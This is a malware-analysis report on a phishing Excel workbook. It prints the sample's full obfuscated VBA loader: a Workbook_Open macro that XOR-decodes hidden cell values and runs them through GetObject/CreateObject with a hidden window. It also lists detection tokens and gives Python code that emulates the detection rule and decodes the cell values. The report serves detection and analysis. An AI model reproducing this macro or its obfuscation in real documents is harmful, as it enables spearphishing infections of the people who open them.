Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 00e77355e35927bb…

MALICIOUS

Office (OLE) / .XLS

Size: 40.5 KB
Created: 2023-05-16 20:24:32
Authoring application: Microsoft Excel
First seen: 2023-05-19
MD5: 6b646f78ecaa120f33f8be8867d43d2a
SHA-1: 6664cd0853992d7c4361c04930abb9ab59ce65f2
SHA-256: 00e77355e35927bbdca2fdebe7c8251af91d1ab90a5cd58957fd7587ef4fd71a
Risk Score: 148

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

The sample is an Excel workbook whose ThisWorkbook module carries a Workbook_Open macro, so the code runs as soon as a user enables macros. The macro is obfuscated with junk InputBox/MsgBox statements that GoTo jumps skip over, with meaningless identifiers, and with heavy blank-line padding. The live path is short: Workbook_Open calls TableT, which reads three cells from the 'q8719' sheet (G192, H169 and E197), passes each through Intent, and executes GetObject(Sought).CreateObject(Danger).Run RetuRning, 0. Intent is a two-stage decoder: Charm turns the cell's hex text into a byte array (Chr(14 + 12 * 2) is "&", so each pair becomes an "&Hxx" literal), and each byte is then XORed with the repeating key "s79f158f83" (held as a Byte array, hence the Camel * 2 index into its UTF-16 representation). The decoded G192 value is the moniker handed to GetObject, E197 is the ProgID handed to CreateObject, and H169 is the command line handed to Run; the trailing 0 runs it with a hidden window. This GetObject/CreateObject/Run chain with a hidden window is a standard pattern for launching a second-stage loader, but the decoded cell contents are not part of this report, so the actual command, and whether it downloads a further payload, are not confirmed here.

Heuristics (5)

  • VBA macros detected (severity: medium; 4 related findings; rule OLE_VBA_MACROS)
    Document contains VBA macro code
  • CreateObject call (severity: high; rule OLE_VBA_CREATEOBJ)
    Matched line in script:
                    GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
  • GetObject call (severity: high; rule OLE_VBA_GETOBJ)
    Matched line in script:
                    GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
  • VBA p-code auto-exec with execution tokens (severity: high; rule OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro (severity: low; rule OLE_VBA_WBOPEN)
    Matched line in script:
    Sub Workbook_Open()
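The pairing rule described in the OLE_VBA_PCODE_AUTOEXEC_EXEC entry, as an added Python example that is not part of this report or of the scanner that produced it. It applies the rule to decompressed VBA text rather than to the p-code stream itself; that is an assumption for readability (the token lists are the same, but a production check for source-less documents would run over the output of a p-code disassembler such as pcodedmp). The inputs are constructed: the first is an abbreviated excerpt of the ThisWorkbook module extracted below, the other two are benign controls written for this example.

```python
import re

# Token sets copied from the OLE_VBA_PCODE_AUTOEXEC_EXEC description above.
AUTOEXEC_TOKENS = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")


def find_tokens(text, tokens):
    """Return the tokens present in `text` as whole words.

    VBA identifiers are case-insensitive, so the match is too. Word boundaries
    keep 'Shell' from firing a second time on 'ShellExecute'.
    """
    return [tok for tok in tokens
            if re.search(r"\b" + re.escape(tok) + r"\b", text, re.IGNORECASE)]


def pcode_autoexec_exec(stream_text):
    """Emulate the pairing rule for one VBA stream.

    Fires only when at least one auto-exec entry point AND at least one
    execution token co-occur in the same stream. Returns
    (fired, autoexec_hits, exec_hits) so a caller can emit the matched tokens
    as the finding's detail line.
    """
    auto_hits = find_tokens(stream_text, AUTOEXEC_TOKENS)
    exec_hits = find_tokens(stream_text, EXEC_TOKENS)
    return (bool(auto_hits) and bool(exec_hits), auto_hits, exec_hits)


# Constructed inputs (this example's own, not scanner output). THIS_WORKBOOK is
# an abbreviated excerpt of the module extracted below with the padding removed.
THIS_WORKBOOK = """Sub Workbook_Open()
GoTo EvaluatEd
EvaluatEd:
If Palestinian = "" Then
TableT
End If
End Sub
Private Sub TableT()
GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
Exit Sub
End Sub
"""

AUTOEXEC_ONLY = """Sub Workbook_Open()
MsgBox "Welcome"
End Sub
"""

EXEC_ONLY = """Sub RefreshData()
Set fso = CreateObject("Scripting.FileSystemObject")
End Sub
"""

if __name__ == "__main__":
    for name, stream in (("ThisWorkbook", THIS_WORKBOOK),
                         ("autoexec-only", AUTOEXEC_ONLY),
                         ("exec-only", EXEC_ONLY)):
        fired, auto_hits, exec_hits = pcode_autoexec_exec(stream)
        print(f"{name}: fired={fired} autoexec={auto_hits} exec={exec_hits}")
```

Only the first stream fires: it pairs Workbook_Open with CreateObject and GetObject, which is exactly the detail an analyst wants next to the finding. A workbook that merely greets the user on open, or a module that only creates a FileSystemObject, each carries one half of the pair and stays quiet.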

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4458 bytes
SHA-256: 0514e10258f8a55f15d89eb9cbf4cd2839f9a62b29699a000dd0f3fa855d4f0d
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Private EngagE As String






                                        Private Discipline As String
Private PhotoshoP As String
Sub Workbook_Open()
GoTo EvaluatEd







          




                                                Dim Palestinian As String







               Palestinian = InputBox("first number")
Dim RequiRing As String
RequiRing = InputBox("last number")








                MsgBox Palestinian
MsgBox RequiRing








EvaluatEd:
If Palestinian = "" Then





              TableT





           





                                                                    End If






                  End Sub
Private Sub TableT()
Dim Sought As String, RetuRning As String, Danger As String








                   GoTo RetuRning
Margaret:







                GetObject(Sought).CreateObject(Danger).Run RetuRning, 0
Exit Sub







Nepal:
Sought = Intent(EngagE): RetuRning = Intent(Discipline): Danger = Intent(PhotoshoP)






                                                GoTo Margaret
RetuRning:





                                                                




                EngagE = Sheets("q8719").Range("G192").Value: Discipline = Sheets("q8719").Range("H169").Value: PhotoshoP = Sheets("q8719").Range("E197").Value
GoTo Nepal
Dim Palestinian As String
Palestinian = InputBox("")
End Sub





               Private Function Charm(ByVal Imports As String) As Variant
Dim Justin() As Byte, i As Long, Camel As Integer, EvaluatEd As Integer








            EvaluatEd = Len(Imports) / 2: i = 0: ReDim Justin(0 To EvaluatEd) As Byte





          




Palestinian:
If i < Len(Imports) Then
Camel = Camel + 1
Justin(Camel - 1) = Chr(14 + (12 * 2)) & "H" & Mid(Imports, i + 1, 2)
i = i + 2
GoTo Palestinian
Else
GoTo RequiRing
End If
RequiRing:
Charm = Justin
End Function





               





          Private Function Intent(ByVal InterventIon As String) As Variant






                Dim DeemeD As Long: DeemeD = 0: Dim Promoting() As Byte: Dim SuSpenSion() As Byte, Justin As String, Camel As Integer





           SuSpenSion = "s79f158f83"
GoTo HouseHolds
Fewer:
Dim RequiRing As String





                                                        RequiRing = InputBox("check result")





                                                            MsgBox RequiRing





Genetics:
If DeemeD < UBound(Promoting) Then
Camel = DeemeD Mod (10)
GoTo Sought
RetuRning:








                                        





                                                            Justin = Justin & Chr(Promoting(DeemeD))






                                                                            DeemeD = DeemeD + 1






                                                                    GoTo Genetics







                                                Else






                                                    GoTo Slave
End If





Imports:





                                                    Dim Palestinian As String
Palestinian = InputBox("enter your value")
Slave:








                  Intent = Justin
Exit Function
HouseHolds:






                                                                    Promoting = Charm(InterventIon)
GoTo Genetics
Sought:






                                                                Promoting(DeemeD) = Abs(Promoting(DeemeD) Xor SuSpenSion(Camel * 2))








                





                                                        GoTo RetuRning
End Function


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
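The Charm/Intent pair above is the only thing standing between the analyst and the three strings that feed GetObject, CreateObject and Run. The following Python is an added example, not part of this report or of the sample, that re-implements the decoder faithfully (hex text to bytes, then XOR with the repeating key "s79f158f83" read from its UTF-16LE byte form, exactly as SuSpenSion(Camel * 2) does) and maps the three cell references to their roles in TableT. The real cell contents are not in the report, so the values fed through it here are constructed; the xlrd-based reader at the end assumes the cells hold the hex text as strings, which the macro's use of Mid() implies but the report does not show.

```python
KEY = "s79f158f83"  # SuSpenSion in Intent()

# Cell -> role, taken from TableT(): EngagE = G192 -> Sought (GetObject moniker),
# Discipline = H169 -> RetuRning (command passed to .Run),
# PhotoshoP = E197 -> Danger (ProgID passed to .CreateObject).
CELL_ROLES = {
    "G192": "getobject_moniker",
    "H169": "run_command",
    "E197": "createobject_progid",
}


def charm(hex_text):
    """Re-implementation of Charm(): hex text -> bytes.

    The VBA builds "&H" & pair (Chr(14 + 12 * 2) is "&") and lets VBA coerce that
    string to a Byte; int(x, 16) does the same job here. ReDim sizes the array to
    Len/2 + 1 elements, so the result carries one trailing zero that Intent()
    never reads. Matches the VBA for even-length input.
    """
    n = len(hex_text) // 2
    buf = bytearray(n + 1)
    i = camel = 0
    while i < len(hex_text):            # If i < Len(Imports) ... GoTo Palestinian
        camel += 1
        buf[camel - 1] = int(hex_text[i:i + 2], 16)
        i += 2
    return bytes(buf)


def intent(hex_text, key=KEY):
    """Re-implementation of Intent(): hex text -> decoded string.

    The key is assigned to a Byte() in VBA, which stores it as UTF-16LE, so the
    macro indexes it with Camel * 2 to read the low byte of each code unit.
    DeemeD runs while DeemeD < UBound(Promoting), i.e. over every element except
    the padding zero at the end.
    """
    key_utf16 = key.encode("utf-16-le")
    data = charm(hex_text)[:-1]
    out = []
    for deemed, b in enumerate(data):
        camel = deemed % 10                 # Camel = DeemeD Mod (10)
        k = key_utf16[camel * 2]            # SuSpenSion(Camel * 2)
        out.append(chr(b ^ k))              # Abs() on a non-negative XOR is a no-op; Chr() byte -> char
    return "".join(out)


def encode_for_cell(plain, key=KEY):
    """Inverse of intent(): the hex text a cell must hold so Intent() yields `plain`.

    Exists only to build constructed test vectors for this example (ASCII input);
    it is not something the sample contains.
    """
    key_utf16 = key.encode("utf-16-le")
    return "".join(f"{ord(c) ^ key_utf16[(i % 10) * 2]:02X}" for i, c in enumerate(plain))


def decode_cells(cells):
    """Map {cell_ref: hex_text} for the three cells TableT() reads to {role: decoded}."""
    return {CELL_ROLES[ref]: intent(cells[ref]) for ref in CELL_ROLES}


def read_cells_from_xls(path, sheet="q8719", refs=tuple(CELL_ROLES)):
    """Pull the raw cell text from the legacy .xls with xlrd (assumed installed).

    Assumption: the cells contain the hex text as strings. Single-letter column
    references only, which is all G192/H169/E197 need.
    """
    import xlrd  # xlrd 2.x reads .xls only, which matches this sample's format
    sh = xlrd.open_workbook(path).sheet_by_name(sheet)
    cells = {}
    for ref in refs:
        col = ord(ref[0].upper()) - ord("A")
        row = int(ref[1:]) - 1
        cells[ref] = str(sh.cell_value(row, col))
    return cells


if __name__ == "__main__":
    # Constructed cell contents standing in for the real, unknown ones.
    sample = {
        "G192": encode_for_cell("new:constructed-moniker"),
        "H169": encode_for_cell("cmd /c echo constructed"),
        "E197": encode_for_cell("WScript.Shell"),
    }
    for role, value in decode_cells(sample).items():
        print(f"{role}: {value}")
```

Against the real file the workflow is `cells = read_cells_from_xls("sample.xls")` followed by `decode_cells(cells)`; the three decoded strings are the indicators this report is missing, and the command line in particular is what decides whether the "download" in the summary actually happens.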